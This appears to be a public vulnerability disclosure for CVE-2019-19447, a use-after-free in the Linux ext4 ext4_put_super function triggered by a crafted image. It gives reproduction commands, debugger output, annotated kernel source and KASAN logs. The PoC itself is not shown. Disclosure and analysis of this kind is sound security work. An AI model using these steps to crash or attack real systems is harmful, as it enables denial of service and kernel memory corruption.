CVE-2019-19447

Target

Linux Kernel ext4 FileSystem

Linux Version / Availability
5.0.21 True

Bug Type

use-after-free

Abstract

Unmounting after some operations on a crafted image can cause a use-after-free in the ext4_put_super function.

It can be triggered not only locally (mounting the ext4 image from a local shell) but also remotely, in the sense of mounting a corrupted USB drive or other storage device that carries the crafted ext4 image.

Reproduce

# Build the PoC binary from the source shipped alongside this report.
gcc -o poc poc_2019_19447.c
mkdir mnt
# Mount the crafted image; in the kernel logs below it shows up as loop0.
mount poc_2019_19447.img ./mnt
cp poc ./mnt/
cd mnt
# Running the PoC on the mounted image produces the "orphan list check failed!"
# message for inode 16 (see the "on exec poc" log below).
./poc
sync
cd ..
# Tearing the mount down is what walks the stale orphan list: the KASAN
# use-after-free in ext4_put_super is reported at this step (see "on umount").
umount ./mnt

Details

Debug view

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x7
 RBX  0xffff88805c795500 —▸ 0xffffffff84a52220 (super_blocks) —▸ 0xffff88805e860000 —▸ 0xffff88805e860880 —▸ 0xffff88805e867700 ◂— ...
 RCX  0x0
 RDX  0xfb
 RDI  0xffff888056ca499c ◂— 0x0
 RSI  0x8
 R8   0xffffed100bdc6061 ◂— 0
 R9   0xffffed100bdc6061 ◂— 0
 R10  0x228
 R11  0xffffed100bdc6060 ◂— 0
 R12  0xdffffc0000000000
 R13  0xffff888056ca49e0 —▸ 0xffff88805c793d88 ◂— 0xffff888056ca49e0
 R14  0xffff88805c793d88 —▸ 0xffff888056ca49e0 ◂— 0xffff88805c793d88
 R15  0xffff88805c793b80 ◂— 0x20 /* ' ' */
 RBP  0xffff88805866fd10 —▸ 0xffff88805866fd40 —▸ 0xffff88805866fd68 —▸ 0xffff88805866fd88 —▸ 0xffff88805866fe28 ◂— ...
 RSP  0xffff88805866fcb0 —▸ 0xffff88805866fca8 —▸ 0xffffffff81b54009 (ext4_put_super+1081) ◂— mov    rdx, r14 /* 0xb848f2894c */
 RIP  0xffffffff81b54822 (ext4_put_super+3154) ◂— 0xfea8e9ffc406e9e8
──────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────
   0xffffffff81b546c5 <ext4_put_super+2805>    add    eax, 3
   0xffffffff81b546c8 <ext4_put_super+2808>    cmp    al, dl
   0xffffffff81b546ca <ext4_put_super+2810>    jl     ext4_put_super+2820 <0xffffffff81b546d4>

   0xffffffff81b546cc <ext4_put_super+2812>    test   dl, dl
   0xffffffff81b546ce <ext4_put_super+2814>    jne    ext4_put_super+3154 <0xffffffff81b54822>
    ↓
 ► 0xffffffff81b54822 <ext4_put_super+3154>    call   __asan_report_load4_noabort <0xffffffff81794f10>
        rdi: 0xffff888056ca499c ◂— 0x0

   0xffffffff81b54827 <ext4_put_super+3159>    jmp    ext4_put_super+2820 <0xffffffff81b546d4>

   0xffffffff81b5482c <ext4_put_super+3164>    call   __asan_report_load4_noabort <0xffffffff81794f10>

   0xffffffff81b54831 <ext4_put_super+3169>    jmp    ext4_put_super+2858 <0xffffffff81b546fa>

   0xffffffff81b54836 <ext4_put_super+3174>    mov    rdi, r14
   0xffffffff81b54839 <ext4_put_super+3177>    call   __asan_report_load8_noabort <0xffffffff81794f30>
───────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /home/phantom/kernel/ubuntu-eoan/fs/ext4/super.c
   932 		 le32_to_cpu(sbi->s_es->s_last_orphan));
   933
   934 	printk(KERN_ERR "sb_info orphan list:\n");
   935 	list_for_each(l, &sbi->s_orphan) {
   936 		struct inode *inode = orphan_list_entry(l);
 ► 937 		printk(KERN_ERR "  "
   938 		       "inode %s:%lu at %p: mode %o, nlink %d, next %d\n",
   939 		       inode->i_sb->s_id, inode->i_ino, inode,
   940 		       inode->i_mode, inode->i_nlink,
   941 		       NEXT_ORPHAN(inode));
   942 	}
───────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp  0xffff88805866fcb0 —▸ 0xffff88805866fca8 —▸ 0xffffffff81b54009 (ext4_put_super+1081) ◂— mov    rdx, r14 /* 0xb848f2894c */
01:0008│      0xffff88805866fcb8 —▸ 0xffffffff818fe3cd (__sync_blockdev+93) ◂— pop    rbx /* 0x7500023c80c35d5b */
02:0010│      0xffff88805866fcc0 —▸ 0xffff88805c793be8 —▸ 0xffff888058c3b400 ◂— 0x400000001000
03:0018│      0xffff88805866fcc8 —▸ 0xffff88805c793bf0 —▸ 0xffff88805b86b648 ◂— 0x0
04:0020│      0xffff88805866fcd0 —▸ 0xffff88805c793bb0 ◂— 1
05:0028│      0xffff88805866fcd8 —▸ 0xffff88805c7958a8 —▸ 0xffff88805c793b80 ◂— 0x20 /* ' ' */
06:0030│      0xffff88805866fce0 —▸ 0xffff888056ca4a48 ◂— 0xd81a4
07:0038│      0xffff88805866fce8 —▸ 0xffff88805c795500 —▸ 0xffffffff84a52220 (super_blocks) —▸ 0xffff88805e860000 —▸ 0xffff88805e860880 ◂— ...
─────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0 ffffffff81b54822 ext4_put_super+3154
   f 1 ffffffff81b54822 ext4_put_super+3154
   f 2 ffffffff81825327 generic_shutdown_super+311
   f 3 ffffffff81827704 kill_block_super+164
   f 4 ffffffff818265f7 deactivate_locked_super+151
   f 5 ffffffff8182763e deactivate_super+350
   f 6 ffffffff8188da72 cleanup_mnt+674
   f 7 ffffffff8188dc62 __cleanup_mnt+18
   f 8 ffffffff81213f5c task_work_run+268
   f 9 ffffffff8100844c exit_to_usermode_loop+444
   f 10 ffffffff8100844c exit_to_usermode_loop+444
───────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/xg $25->i_mode
0x0 <fixed_percpu_data>:	Cannot access memory at address 0x0
pwndbg> x/xg &$25->i_mode
0xffff888056ca499c:	0x0000000000000000

The local variable inode points to already-freed memory; the read of inode->i_mode is a use-after-free.

Bug causes

fs/ext4/super.c:1022 (link)

/*
 * dump_orphan_inode - log one entry of the in-memory orphan list.
 * @inode: the inode linked on sbi->s_orphan
 *
 * Every field printed here is read through @inode, and nothing on this path
 * checks that the object is still allocated.  If the inode was already
 * released, the i_mode read marked [1] is the stale access that the KASAN
 * report above attributes to ext4_put_super ("Read of size 4").
 */
static void dump_orphan_inode(struct inode *inode)
{
	printk(KERN_ERR "  inode %s:%lu at %p: mode %o, nlink %d, next %d\n",
	       inode->i_sb->s_id, inode->i_ino, inode,
	       inode->i_mode, inode->i_nlink,		/* [1] */
	       NEXT_ORPHAN(inode));
}

/*
 * dump_orphan_list - print the on-disk orphan head and the in-memory list.
 * @sb:  superblock being torn down; handed to ext4_msg() for the log prefix
 * @sbi: ext4 private super info; provides s_es (on-disk super) and s_orphan
 *
 * Mirrors dump_orphan_list() in fs/ext4/super.c (it appears inlined into
 * ext4_put_super in the traces above).  The walk assumes every entry on
 * sbi->s_orphan is a live inode.  The "Freed by task 9" stack shows that
 * assumption broken at umount: the inode was released through
 * ext4_free_in_core_inode() from an RCU callback, apparently while still
 * linked, so this dump is where the dangling pointer is first dereferenced,
 * not where the list became stale.
 */
static void dump_orphan_list(struct super_block *sb, struct ext4_sb_info *sbi)
{
	struct list_head *pos;

	ext4_msg(sb, KERN_ERR, "sb orphan head is %d",
		 le32_to_cpu(sbi->s_es->s_last_orphan));

	printk(KERN_ERR "sb_info orphan list:\n");
	list_for_each(pos, &sbi->s_orphan)
		dump_orphan_inode(orphan_list_entry(pos));
}

The local variable inode points to an inode that has already been freed.

The read of inode->i_mode at [1] is therefore a use-after-free.

KASAN logs

On executing the poc binary:

[   70.514180] EXT4-fs (loop0): Inode 16 (00000000398b8d7e): orphan list check failed!
[   70.515448] 00000000398b8d7e: 0002f30a 00000004 00000000 00000000  ................
[   70.516068] 0000000031a80184: 00000001 00002602 00000005 00000005  .....&..........
[   70.516410] 00000000b74037e1: 00000415 00000000 00000000 00000000  ................
[   70.516764] 00000000e38e5d58: 00000000 00000000 00000000 00000000  ................
[   70.516925] 000000001b41d036: 00000000 00000000 00000000 00000000  ................
[   70.517453] 000000000e0c9cd1: 00080000 00000081 00000000 00000000  ................
[   70.518007] 0000000090f825fb: 5e3a4441 ffff8880 00000000 00000000  AD:^............
[   70.518741] 00000000dde5e99d: 5711a5f0 ffff8880 5711a5f0 ffff8880  ...W.......W....
[   70.519063] 0000000066c4afe3: 5c5e0208 ffff8880 5c5e0208 ffff8880  ..^\......^\....
[   70.520489] 00000000582fb0f0: 000026a2 00000000 00000000 00000000  .&..............
[   70.521006] 00000000f2ccc187: 00000000 00000000 00000000 00000000  ................
[   70.521475] 00000000c5600ccd: 5711a630 ffff8880 5711a630 ffff8880  0..W....0..W....
[   70.521801] 000000008102adde: 00000000 00000000 00000000 00000000  ................
[   70.522801] 0000000094c61296: 00000000 00000000 5711a658 ffff8880  ........X..W....
[   70.523224] 000000001c750527: 5711a658 ffff8880 000d81a4 00000000  X..W............
[   70.523720] 00000000f2d11ef7: 00000000 00001000 ffffffff ffffffff  ................
[   70.524032] 0000000075b985f1: ffffffff ffffffff 83f66b00 ffffffff  .........k......
[   70.524529] 000000007aa63ddb: 5ba29980 ffff8880 5711a7d8 ffff8880  ...[.......W....
[   70.525093] 00000000d7d55bea: 00000000 00000000 00000010 00000000  ................
[   70.525594] 0000000022c200c6: 00000001 00000000 000026a2 00000000  .........&......
[   70.530151] 0000000083f74df1: 5b437ccf 00000000 00000000 00000000  .|C[............
[   70.530437] 00000000d295a5ce: 5de00a4b 00000000 00000000 00000000  K..]............
[   70.533894] 000000002151a88f: 5de00a4d 00000000 00000000 00000000  M..]............
[   70.535197] 00000000489bb644: 00000000 000a0000 0000000c 00000000  ................
[   70.535944] 0000000077b78e8d: 00000060 00000000 00000000 00000000  `...............
[   70.536336] 000000005d682604: 00000000 00000000 00000000 00000000  ................
[   70.536749] 00000000e44b8b5f: 5711a720 ffff8880 5711a720 ffff8880   ..W.... ..W....
[   70.537225] 00000000ebfe0158: ffff1c92 00000000 00000000 00000000  ................
[   70.537696] 0000000057913d6d: 00000000 00000000 00000000 00000000  ................
[   70.538151] 000000004f35597b: 5711a750 ffff8880 5711a750 ffff8880  P..W....P..W....
[   70.538513] 00000000aa1c2ea5: 00000000 00000000 00000000 00000000  ................
[   70.539378] 00000000d626d83a: 5711a770 ffff8880 5711a770 ffff8880  p..W....p..W....
[   70.540006] 000000001f8ec46f: 5711a780 ffff8880 5711a780 ffff8880  ...W.......W....
[   70.540404] 00000000fa059804: 5711a790 ffff8880 5711a790 ffff8880  ...W.......W....
[   70.540737] 00000000b4137f30: 00000000 00000000 00000000 00000000  ................
[   70.541137] 000000001a0b7eb1: 00000003 00000000 00000000 00000000  ................
[   70.541709] 000000000a0bfc9d: 00000000 00000000 83f66be0 ffffffff  .........k......
[   70.542431] 00000000722b027b: 00000000 00000000 5711a668 ffff8880  ........h..W....
[   70.547118] 000000006819311e: 00000000 00000021 00000000 00000000  ....!...........
[   70.553702] 0000000039ad89ec: 00100cca 00000000 00000000 00000000  ................
[   70.553878] 00000000d70b18d2: 00000000 00000000 00000000 00000000  ................
[   70.554071] 00000000830fd3a8: 00000000 00000000 00000000 00000000  ................
[   70.554320] 0000000050b6025a: 5711a820 ffff8880 5711a820 ffff8880   ..W.... ..W....
[   70.556063] 00000000ebe5db74: 00000000 00000000 00000000 00000000  ................
[   70.557593] 000000001f87a59a: 00000002 00000000 83f699c0 ffffffff  ................
[   70.559632] 0000000021876c93: 00000010 00000000 00000000 00000000  ................
[   70.560213] 000000007c60ff65: 5711a860 ffff8880 5711a860 ffff8880  `..W....`..W....
[   70.560868] 00000000b1bd0065: 00000000 00000000 5711a878 ffff8880  ........x..W....
[   70.561605] 0000000085c214ec: 5711a878 ffff8880 00000000 00000000  x..W............
[   70.562170] 000000007c068c98: 709b874b 00000000 00000000 00000000  K..p............
[   70.571184] 00000000a7404afe: 00000000 00000000 00000000 00000000  ................
[   70.572391] 000000004e2bf3f0: 00000000 00000000 00000000 00000000  ................
[   70.573505] 00000000540f7073: 00000000 00000000 00000000 00000000  ................
[   70.575277] 0000000063397336: 5711a8d0 ffff8880 5711a8d0 ffff8880  ...W.......W....
[   70.576702] 00000000de9c6f36: 00000000 00000000 00000000 00000000  ................
[   70.577079] 00000000ce801087: 00000000 00000000 00000000 00000000  ................
[   70.577924] 000000009d7ca9b2: 5711a900 ffff8880 5711a900 ffff8880  ...W.......W....
[   70.579019] 0000000011d25d53: 00000000 00000000 00000000 ffffffff  ................
[   70.579676] 000000005397d68a: 00000000 00000000 00000000 00000000  ................
[   70.580091] 000000007552ca24: 00000000 00000000 00000000 00000000  ................
[   70.580538] 00000000736e80a0: 00000000 00000000 00000000 00000000  ................
[   70.581013] 00000000c20fcf10: 5711a950 ffff8880 5711a950 ffff8880  P..W....P..W....
[   70.581606] 0000000059bd8892: ffffffe0 0000000f 5711a968 ffff8880  ........h..W....
[   70.581854] 000000002f550778: 5711a968 ffff8880 81af3590 ffffffff  h..W.....5......
[   70.582275] 00000000b172abd5: 00000000 00000000 0000001d 00000018  ................
[   70.584187] 0000000097935071: 00000000 00000000 00000000 00000000  ................
[   70.585094] 000000005b513948: 00000000 00000000 00000000 00000000  ................
[   70.587113] CPU: 0 PID: 327 Comm: umount Not tainted 5.3.7 #1
[   70.587848] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   70.587982] Call Trace:
[   70.587982]  dump_stack+0x7b/0xb5
[   70.587982]  ext4_destroy_inode+0xe0/0x110
[   70.587982]  destroy_inode+0xc5/0x1a0
[   70.587982]  evict+0x348/0x530
[   70.587982]  ? _raw_spin_lock+0x82/0xf0
[   70.587982]  dispose_list+0xe7/0x1d0
[   70.587982]  evict_inodes+0x2fa/0x400
[   70.587982]  ? dispose_list+0x1d0/0x1d0
[   70.591535]  ? __sync_blockdev+0x5d/0xb0
[   70.591535]  ? __sync_filesystem+0x9c/0xd0
[   70.591535]  generic_shutdown_super+0xb3/0x380
[   70.591535]  kill_block_super+0xa4/0x1f0
[   70.591535]  deactivate_locked_super+0x97/0xe0
[   70.591535]  deactivate_super+0x15e/0x180
[   70.591535]  ? destroy_unused_super+0xf0/0xf0
[   70.591535]  ? dput+0x5e/0x780
[   70.591535]  cleanup_mnt+0x2a2/0x400
[   70.591535]  __cleanup_mnt+0x12/0x20
[   70.591535]  task_work_run+0x10c/0x180
[   70.594978]  exit_to_usermode_loop+0x1bc/0x280
[   70.594978]  do_syscall_64+0x25b/0x2f0
[   70.594978]  ? prepare_exit_to_usermode+0xf1/0x1a0
[   70.594978]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   70.594978] RIP: 0033:0x7f2018f8ed77
[   70.594978] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f 1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[   70.594978] RSP: 002b:00007ffecf2bf808 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[   70.594978] RAX: 0000000000000000 RBX: 000055ae60680060 RCX: 00007f2018f8ed77
[   70.594978] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 000055ae60686e30
[   70.594978] RBP: 000055ae60686e30 R08: 000055ae60685080 R09: 0000000000000014
[   70.594978] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f2019490e64
[   70.594978] R13: 0000000000000000 R14: 000055ae60680240 R15: 00007ffecf2bfa90
cc[   71.766132] EXT4-fs (loop0): sb orphan head is 16
[   71.797307] sb_info orphan list:

On umount:

[   71.797689] ==================================================================
[   71.799205] BUG: KASAN: use-after-free in ext4_put_super+0xc57/0xd30
[   71.799205] Read of size 4 at addr ffff88805711a5bc by task umount/327
[   71.799205]
[   71.799205] CPU: 0 PID: 327 Comm: umount Not tainted 5.3.7 #1
[   71.799205] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   71.799205] Call Trace:
[   71.799205]  dump_stack+0x7b/0xb5
[   71.799205]  print_address_description+0x7c/0x3b0
[   71.799205]  ? ext4_put_super+0xc57/0xd30
[   71.799205]  __kasan_report+0x134/0x191
[   71.799205]  ? ext4_put_super+0xc57/0xd30
[   71.799205]  ? ext4_put_super+0xc57/0xd30
[   71.799205]  kasan_report+0x12/0x20
[   71.799205]  __asan_report_load4_noabort+0x14/0x20
[   71.799205]  ext4_put_super+0xc57/0xd30
[   71.799205]  ? __sync_blockdev+0x5d/0xb0
[   71.799205]  generic_shutdown_super+0x137/0x380
[   71.799205]  kill_block_super+0xa4/0x1f0
[   71.799205]  deactivate_locked_super+0x97/0xe0
[   71.799205]  deactivate_super+0x15e/0x180
[   71.799205]  ? destroy_unused_super+0xf0/0xf0
[   71.799205]  ? dput+0x5e/0x780
[   71.799205]  cleanup_mnt+0x2a2/0x400
[   71.799205]  __cleanup_mnt+0x12/0x20
[   71.799205]  task_work_run+0x10c/0x180
[   71.799205]  exit_to_usermode_loop+0x1bc/0x280
[   71.799205]  do_syscall_64+0x25b/0x2f0
[   71.799205]  ? prepare_exit_to_usermode+0xf1/0x1a0
[   71.799205]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   71.799205] RIP: 0033:0x7f2018f8ed77
[   71.799205] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f 1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[   71.799205] RSP: 002b:00007ffecf2bf808 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[   71.799205] RAX: 0000000000000000 RBX: 000055ae60680060 RCX: 00007f2018f8ed77
[   71.799205] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 000055ae60686e30
[   71.799205] RBP: 000055ae60686e30 R08: 000055ae60685080 R09: 0000000000000014
[   71.799205] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f2019490e64
[   71.799205] R13: 0000000000000000 R14: 000055ae60680240 R15: 00007ffecf2bfa90
[   71.799205]
[   71.799205] Allocated by task 324:
[   71.799205]  save_stack+0x21/0x90
[   71.799205]  __kasan_kmalloc+0xcc/0xe0
[   71.799205]  kasan_slab_alloc+0x14/0x20
[   71.799205]  kmem_cache_alloc+0xd3/0x260
[   71.799205]  ext4_alloc_inode+0x1d/0x700
[   71.799205]  alloc_inode+0x60/0x190
[   71.799205]  iget_locked+0x157/0x3f0
[   71.799205]  __ext4_iget+0x210/0x5620
[   71.799205]  ext4_lookup+0x2ad/0x6d0
[   71.799205]  __lookup_slow+0x1af/0x3a0
[   71.799205]  lookup_slow+0x56/0x80
[   71.799205]  walk_component+0x6a5/0xfa0
[   71.799205]  path_lookupat+0x18f/0x8c0
[   71.799205]  filename_lookup+0x183/0x3c0
[   71.799205]  user_path_at_empty+0x36/0x40
[   71.799205]  do_sys_truncate+0x8e/0x120
[   71.799205]  __x64_sys_truncate+0x54/0x80
[   71.799205]  do_syscall_64+0xa5/0x2f0
[   71.799205]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   71.799205]
[   71.799205] Freed by task 9:
[   71.799205]  save_stack+0x21/0x90
[   71.799205]  __kasan_slab_free+0x137/0x180
[   71.799205]  kasan_slab_free+0xe/0x10
[   71.799205]  kmem_cache_free+0xe3/0x2e0
[   71.799205]  ext4_free_in_core_inode+0x25/0x30
[   71.799205]  i_callback+0x44/0x70
[   71.799205]  rcu_core+0x414/0xe90
[   71.799205]  rcu_core_si+0xe/0x10
[   71.799205]  __do_softirq+0x1b2/0x605
[   71.799205]
[   71.799205] The buggy address belongs to the object at ffff88805711a580
[   71.799205]  which belongs to the cache ext4_inode_cache of size 1072
[   71.799205] The buggy address is located 60 bytes inside of
[   71.799205]  1072-byte region [ffff88805711a580, ffff88805711a9b0)
[   71.799205] The buggy address belongs to the page:
[   71.799205] page:ffffea00015c4600 refcount:1 mapcount:0 mapping:ffff88805c8c6600 index:0x0 compound_mapcount: 0
[   71.799205] flags: 0xfffffc0010200(slab|head)
[   71.799205] raw: 000fffffc0010200 dead000000000100 dead000000000122 ffff88805c8c6600
[   71.799205] raw: 0000000000000000 00000000800d000d 00000001ffffffff 0000000000000000
[   71.799205] page dumped because: kasan: bad access detected
[   71.799205]
[   71.799205] Memory state around the buggy address:
[   71.799205]  ffff88805711a480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   71.799205]  ffff88805711a500: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   71.799205] >ffff88805711a580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   71.799205]                                         ^
[   71.799205]  ffff88805711a600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   71.799205]  ffff88805711a680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   71.799205] ==================================================================
[   71.799205] Disabling lock debugging due to kernel taint
[   71.841308]   inode loop0:16 at 000000003fa23361: mode 100644, nlink 1, next 0
[   71.843393] ------------[ cut here ]------------
[   71.843657] kernel BUG at fs/ext4/super.c:1028!
[   71.844866] invalid opcode: 0000 [#1] SMP KASAN NOPTI
[   71.845300] CPU: 0 PID: 327 Comm: umount Tainted: G    B             5.3.7 #1
[   71.845883] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   71.846901] RIP: 0010:ext4_put_super+0x958/0xd30
[   71.846901] Code: 00 00 00 00 00 fc ff df 66 45 89 65 3a 48 c1 ea 03 80 3c 02 00 0f 85 1d 03 00 00 f6 43 50 01 0f 85 7b f8 ff ff e9 69 f8 ff ff <0f> 0b 49 8d 7f 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea
[   71.846901] RSP: 0018:ffff888057bbfcb0 EFLAGS: 00000202
[   71.846901] RAX: ffff88805711a600 RBX: ffff88805ba29980 RCX: ffffffff81b547bb
[   71.846901] RDX: 1ffff1100b8bc041 RSI: 0000000000000008 RDI: ffff88805711a600
[   71.846901] RBP: ffff888057bbfd10 R08: ffffed100bdc6061 R09: ffffed100bdc6061
[   71.846901] R10: 0000000000000001 R11: ffffed100bdc6060 R12: dffffc0000000000
[   71.846901] R13: ffff88805c5e0208 R14: ffff88805c5e0208 R15: ffff88805c5e0000
[   71.846901] FS:  00007f20196ace40(0000) GS:ffff88805ee00000(0000) knlGS:0000000000000000
[   71.846901] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   71.846901] CR2: 00007fb2b78a8020 CR3: 000000005b412000 CR4: 00000000000006f0
[   71.846901] Call Trace:
[   71.846901]  ? __sync_blockdev+0x5d/0xb0
[   71.846901]  generic_shutdown_super+0x137/0x380
[   71.846901]  kill_block_super+0xa4/0x1f0
[   71.846901]  deactivate_locked_super+0x97/0xe0
[   71.846901]  deactivate_super+0x15e/0x180
[   71.846901]  ? destroy_unused_super+0xf0/0xf0
[   71.846901]  ? dput+0x5e/0x780
[   71.846901]  cleanup_mnt+0x2a2/0x400
[   71.846901]  __cleanup_mnt+0x12/0x20
[   71.846901]  task_work_run+0x10c/0x180
[   71.846901]  exit_to_usermode_loop+0x1bc/0x280
[   71.846901]  do_syscall_64+0x25b/0x2f0
[   71.846901]  ? prepare_exit_to_usermode+0xf1/0x1a0
[   71.846901]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   71.846901] RIP: 0033:0x7f2018f8ed77
[   71.846901] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f 1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[   71.846901] RSP: 002b:00007ffecf2bf808 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[   71.846901] RAX: 0000000000000000 RBX: 000055ae60680060 RCX: 00007f2018f8ed77
[   71.846901] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 000055ae60686e30
[   71.846901] RBP: 000055ae60686e30 R08: 000055ae60685080 R09: 0000000000000014
[   71.846901] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f2019490e64
[   71.846901] R13: 0000000000000000 R14: 000055ae60680240 R15: 00007ffecf2bfa90
[   71.846901] Modules linked in:
[   71.866012] ---[ end trace eaddedf1fbf9a8ba ]---
[   71.866267] RIP: 0010:ext4_put_super+0x958/0xd30
[   71.866423] Code: 00 00 00 00 00 fc ff df 66 45 89 65 3a 48 c1 ea 03 80 3c 02 00 0f 85 1d 03 00 00 f6 43 50 01 0f 85 7b f8 ff ff e9 69 f8 ff ff <0f> 0b 49 8d 7f 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea
[   71.872138] RSP: 0018:ffff888057bbfcb0 EFLAGS: 00000202
[   71.872528] RAX: ffff88805711a600 RBX: ffff88805ba29980 RCX: ffffffff81b547bb
[   71.873012] RDX: 1ffff1100b8bc041 RSI: 0000000000000008 RDI: ffff88805711a600
[   71.873189] RBP: ffff888057bbfd10 R08: ffffed100bdc6061 R09: ffffed100bdc6061
[   71.873367] R10: 0000000000000001 R11: ffffed100bdc6060 R12: dffffc0000000000
[   71.873718] R13: ffff88805c5e0208 R14: ffff88805c5e0208 R15: ffff88805c5e0000
[   71.874570] FS:  00007f20196ace40(0000) GS:ffff88805ee00000(0000) knlGS:0000000000000000
[   71.877602] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   71.877981] CR2: 00007fb2b78a8020 CR3: 000000005b412000 CR4: 00000000000006f0
./emount.sh: line 19:   327 Segmentation fault      umount ./mnt

Conclusion

Unmounting after some operations on a crafted image can cause a use-after-free in the ext4_put_super function.

It could be abused for malicious purposes.

Discoverer

Team bobfuzzer

Acknowledgments

This project used a version of the filesystem fuzzer 'JANUS', developed by the Georgia Tech Systems Software & Security Lab (SSLab), ported to Linux kernels 5.0.21 and 5.3.14.

Thank you for the excellent fuzzer and paper below.